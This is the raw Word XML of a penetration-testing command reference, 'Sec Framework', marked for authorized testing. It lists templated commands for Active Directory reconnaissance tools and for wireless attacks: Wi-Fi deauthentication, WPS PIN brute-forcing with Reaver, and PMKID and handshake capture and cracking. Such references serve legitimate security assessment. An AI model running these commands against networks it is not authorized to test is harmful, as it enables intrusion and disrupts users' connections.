          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Active Directory attack path analysis tool. Ingests AD data and uses graph theory to identify escalation paths from any user to Domain Admin, revealing hidden attack vectors.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bloodhound-python -d $DOMAIN -u $USER -p $PASSWORD -ns $DC -c All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All -d $DOMAIN --zipfilename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Session -d $DOMAIN --zipfilename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LoggedOn -d $DOMAIN --zipfilename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Group -d $DOMAIN --zipfilename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ACL -d $DOMAIN --zipfilename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DCOM -d $DOMAIN --zipfilename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RDP -d $DOMAIN --zipfilename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PSRemote -d $DOMAIN --zipfilename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Container -d $DOMAIN --zipfilename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All,GPOLocalGroup -d $DOMAIN --zipfilename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8. PingCastle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Active Directory security assessment tool focused on risk metrics and compliance. Provides a health score for AD infrastructure with detailed findings for security improvement.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PingCastle.exe --healthcheck --server $DC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PingCastle.exe --healthcheck --server $DC --advanced-liveanalysis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PingCastle.exe --carto --server $DC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PingCastle.exe --graph --server $DC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PingCastle.exe --schema --server $DC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PingCastle.exe --aclcheck --server $DC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PingCastle.exe --scanner smb --server $DC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PingCastle.exe --scanner antivIRus --server $DC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PingCastle.exe --scanner outdated --server $DC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PingCastle.exe --nullsession --server $DC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PingCastle.exe --conso --server $DC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. ADRecon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comprehensive Active Directory reconnaissance tool that extracts extensive information about AD objects, permissions, and configurations for thorough environment mapping.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ADRecon.ps1 -Domain $DOMAIN -Credential $CREDS -Method LDAP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ADRecon.ps1 -Domain $DOMAIN -Method ADWS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ADRecon.ps1 -Domain $DOMAIN -Method ADSI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ADRecon.ps1 -Domain $DOMAIN -Collect Domain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ADRecon.ps1 -Domain $DOMAIN -Collect ACLs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ADRecon.ps1 -Domain $DOMAIN -Collect GroupPolicy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ADRecon.ps1 -Domain $DOMAIN -Collect Users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ADRecon.ps1 -Domain $DOMAIN -Collect Groups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ADRecon.ps1 -Domain $DOMAIN -Collect Computers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ADRecon.ps1 -Domain $DOMAIN -Collect Trusts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ADRecon.ps1 -Domain $DOMAIN -ADOptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. SharpHound</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>BloodHound's C# data collector for Active Directory. Ingests relationships, permissions, and session data using multiple collection methods for comprehensive attack path mapping.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Default -d $DOMAIN --zipfilename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All -d $DOMAIN --stealth --zipfilename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Session,LoggedOn -d $DOMAIN --zipfilename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ACL,GPOLocalGroup -d $DOMAIN --zipfilename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Default,DCOnly -d $DOMAIN --zipfilename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ComputerOnly -d $DOMAIN --zipfilename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Default -d $DOMAIN --loop --loopduration 00:30:00 --zipfilename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Default -d $DOMAIN --memcache --zipfilename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Default -d $DOMAIN --outputdirectory $DIR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Default -d $DOMAIN --excludedomains $EXCLUDE --zipfilename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SharpHound.exe -c Default -d $DOMAIN --computerfile $FILE --zipfilename $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 10: Wireless</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Assessing wireless network security across Wi-Fi, Bluetooth, and RF protocols. This phase encompasses signal analysis, handshake capture, encryption cracking, and rogue access point deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools are selected for hardware compatibility, protocol coverage, and proven effectiveness against modern wireless security implementations including WPA3 and enterprise authentication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The complete suite of tools for Wi-Fi network security assessment. Includes airodump-ng for capture, aireplay-ng for injection, and aircrack-ng for key recovery against WEP and WPA/WPA2.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airmon-ng start $INTERFACE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airodump-ng $MON_INTERFACE --write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airodump-ng -c $CHANNEL --bssid $BSSID -w $OUTPUT $MON_INTERFACE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aireplay-ng -0 10 -a $BSSID -c $CLIENT $MON_INTERFACE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aireplay-ng -1 0 -e $ESSID -a $BSSID -h $MAC $MON_INTERFACE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aireplay-ng -3 -b $BSSID -h $MAC $MON_INTERFACE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aircrack-ng -w $WORDLIST -b $BSSID $CAPTURE_FILE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aircrack-ng -w $WORDLIST -e $ESSID $CAPTURE_FILE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airdecap-ng -w $KEY -b $BSSID $CAPTURE_FILE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airodump-ng --band abg $MON_INTERFACE --write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airmon-ng stop $MON_INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Wifite2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated wireless attack tool that simplifies the process of auditing Wi-Fi networks. Handles monitor mode, target selection, deauthentication, and cracking with minimal user interaction.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wifite --cracked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wifite -i $INTERFACE --dict $WORDLIST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wifite -i $INTERFACE --wpa --dict $WORDLIST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wifite -i $INTERFACE --wep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wifite -i $INTERFACE --pmkid --dict $WORDLIST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wifite -i $INTERFACE --wps --pixie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wifite -i $INTERFACE --clients-only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wifite -i $INTERFACE --nodeauths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wifite -i $INTERFACE --kill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wifite -i $INTERFACE --band 2.4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wifite -i $INTERFACE --band 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. hcxdumptool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced WLAN attack and capture tool optimized for PMKID and handshake capture. Superior performance for hashcat-based cracking with minimal deauthentication traffic.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hcxdumptool -i $INTERFACE -o $OUTPUT --enable_status=1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hcxdumptool -i $INTERFACE -o $OUTPUT --filterlist_ap=$AP_LIST --filtermode=2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hcxdumptool -i $INTERFACE -o $OUTPUT --disable_deauthentication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hcxdumptool -i $INTERFACE -o $OUTPUT --do_rcascan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hcxdumptool -i $INTERFACE -o $OUTPUT --tot=$SECONDS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hcxdumptool -i $INTERFACE -o $OUTPUT --station_vendor=$VENDOR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hcxdumptool -i $INTERFACE -o $OUTPUT --bpfc=$BPF_FILTER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hcxdumptool -i $INTERFACE -o $OUTPUT --essidlist=$ESSID_LIST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hcxdumptool -i $INTERFACE -o $OUTPUT --beacon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hcxdumptool -i $INTERFACE -o $OUTPUT --proberesponse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hcxdumptool -i $INTERFACE -o $OUTPUT --association</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. hcxtools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Companion utilities to hcxdumptool for converting and analyzing wireless captures. Converts PMKIDs and handshakes to hashcat-compatible formats with extensive filtering capabilities.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hcxpcapngtool -o $HASH_FILE -E $ESSID_LIST $CAPTURE_FILE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hcxpcapngtool -o $HASH_FILE -E $ESSID_LIST --all $CAPTURE_FILE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hcxpcapngtool -o $HASH_FILE -E $ESSID_LIST --pmkid $CAPTURE_FILE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hcxpcapngtool -o $HASH_FILE -E $ESSID_LIST --hccapx $CAPTURE_FILE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hcxhashtool -i $HASH_FILE --info=stdout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hcxhashtool -i $HASH_FILE --vendor=stdout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hcxhashtool -i $HASH_FILE --essid=$ESSID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hcxhashtool -i $HASH_FILE --mac_ap=$BSSID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hcxhashtool -i $HASH_FILE --oui=$OUI -o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hcxhash2cap -i $HASH_FILE -a $BSSID -c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hcxpsktool --hashfile $HASH_FILE -o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5. Reaver</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Specialized WPS PIN recovery tool for brute-forcing Wi-Fi Protected Setup. Exploits the WPS design flaw to recover WPA/WPA2 passphrases regardless of password complexity.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reaver -i $INTERFACE -b $BSSID -vv -c $CHANNEL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reaver -i $INTERFACE -b $BSSID -vv -K 1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reaver -i $INTERFACE -b $BSSID -vv -p $PIN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reaver -i $INTERFACE -b $BSSID -vv --no-nacks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reaver -i $INTERFACE -b $BSSID -vv -d $DELAY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reaver -i $INTERFACE -b $BSSID -vv -t $TIMEOUT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reaver -i $INTERFACE -b $BSSID -vv -l $LOCK_DELAY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reaver -i $INTERFACE -b $BSSID -vv -g $MAX_ATTEMPTS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reaver -i $INTERFACE -b $BSSID -vv -x $FAIL_WAIT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reaver -i $INTERFACE -b $BSSID -vv -r $RECOVERY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reaver -i $INTERFACE -b $BSSID -vv -e $ESSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. Bettercap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern network attack and monitoring framework with comprehensive wireless capabilities. Supports Wi-Fi deauthentication, probe sniffing, and rogue access point creation.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'wifi.recon on; wifi.show'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'wifi.recon.channel $CHANNEL; wifi.recon on'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'wifi.deauth $BSSID'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'wifi.assoc $BSSID'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'wifi.probe $ESSID $BSSID'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'wifi.recon on; wifi.show.sort clients desc'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'wifi.show.wps'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'wifi.recon on; wifi.handshakes.file $OUTPUT'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'wifi.recon on; wifi.assoc.all'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'wifi.recon on; wifi.show.filter $ESSID'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bettercap -iface $INTERFACE -eval 'wifi.recon on; set ticker.commands wifi.show'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Kismet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Wireless network detector, packet sniffer, and intrusion detection system. Passively identifies wireless networks, devices, and clients across multiple protocols with GPS integration.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kismet -c $INTERFACE --log-prefix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kismet -c $INTERFACE:$CHANNEL --log-prefix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kismet -c $INTERFACE --use-gpsd-gps --log-prefix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kismet -c $INTERFACE --no-logging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kismet -c $INTERFACE --daemonize --log-prefix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kismet -c $INTERFACE --write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kismet -c $INTERFACE --channel $CHANNEL --log-prefix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kismet -c $INTERFACE --band 5ghz --log-prefix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kismet -c $INTERFACE --band 2.4ghz --log-prefix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kismet -c $INTERFACE --enablesources $SOURCE --log-prefix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kismet -c $INTERFACE --disable-sources $SOURCE --log-prefix $OUTPUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. BlueZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Official Linux Bluetooth protocol stack with comprehensive tools for device discovery, service enumeration, and low-level Bluetooth protocol interaction.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hcitool scan --length=$LEN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hcitool inq --length=$LEN --numrsp=$NUM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hcitool name $BDADDR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hcitool info $BDADDR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hcitool cmd $OGF $OCF $PARAMS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sdptool browse $BDADDR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sdptool search $SERVICE $BDADDR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l2ping -c $COUNT $BDADDR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l2ping -i $INTERFACE -c $COUNT $BDADDR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hcitool lescan --duplicates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hcitool leinfo $BDADDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. BlueHydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Bluetooth device discovery service built on BlueZ. Continuously monitors for Bluetooth and BLE devices with database logging and alerting capabilities.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blue_hydra -d $INTERFACE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blue_hydra --ui $INTERFACE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blue_hydra --no-db $INTERFACE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blue_hydra --btle $INTERFACE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blue_hydra --classic $INTERFACE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blue_hydra --rssi $THRESHOLD $INTERFACE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blue_hydra --inquiry $INTERFACE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blue_hydra --no-inquiry $INTERFACE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blue_hydra --status $INTERFACE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blue_hydra --debug $INTERFACE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blue_hydra --log $LOG_FILE $INTERFACE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. Ubertooth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open source wireless development platform for Bluetooth experimentation. Enables Bluetooth sniffing, inquiry scan detection, and low-energy packet capture with specialized hardware.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="30363d" w:sz="6"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="single" w:color="30363d" w:sz="6"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="single" w:color="30363d" w:sz="4"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2500"/>
        <w:gridCol w:w="7500"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2500" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="161b22"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="3fb950"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7500" w:type="dxa"/>
            <w:shd w:val="clear" w:fill="161b22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9d1d9"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Command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Standard Execution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ubertooth-rx -l $LAP -u $UAP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Extended Options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ubertooth-btle -f -c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Specific Source/Target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ubertooth-btle -p -c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Pipeline Integration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ubertooth-btle -s $BDADDR -c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Filtering/Exclusion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ubertooth-btle -t $CHANNEL -c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Proxy/Tunnel Support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ubertooth-scan -t $TIMEOUT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Speed/Performance Tuning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ubertooth-afh -l $LAP -c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JSON/Structured Output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ubertooth-follow -l $LAP -u $UAP -c $OUTPUT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Batch/Mass Operations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ubertooth-debug -r 1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Specialized Mode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ubertooth-specan -d $DURATION -l $LOW_FREQ -u $HIGH_FREQ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8b949e"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Advanced Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7500" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="c9d1d9"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ubertooth-util -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="R3eca02ee1e6441bd"/>
          <w:footerReference w:type="default" r:id="R26f7f15c3d9f4c65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652c36e008a0493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b/>
          <w:color w:val="3fb950"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Sec Framework</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Authorized Security Testing Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="6e7681"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>June 2026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e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr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g.png"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="Rbb84887b16344494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6e7681"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Sec Framework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</w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
      <w:color w:val="c9d1d9"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
      <w:b/>
      <w:color w:val="3fb950"/>
      <w:sz w:val="40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rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
      <w:b/>
      <w:color w:val="3fb950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rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
      <w:b/>
      <w:color w:val="238636"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="6e7681"/>
      <w:sz w:val="18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/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="c9d1d9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8b949e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d67f22b928e543d6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="Racb90225c41b44ff" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image.png" Id="R3ea2f0baa5c34b0d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="R652c36e008a04939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="R3eca02ee1e6441bd" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="R26f7f15c3d9f4c65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="R13f5d556b7d14d5b" /></Relationships>
</file>

<file path=word/_rels/header1.xml.rels><?xml version='1.0' encoding='UTF-8'?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png" Id="Rbb84887b16344494" /></Relationships>
</file>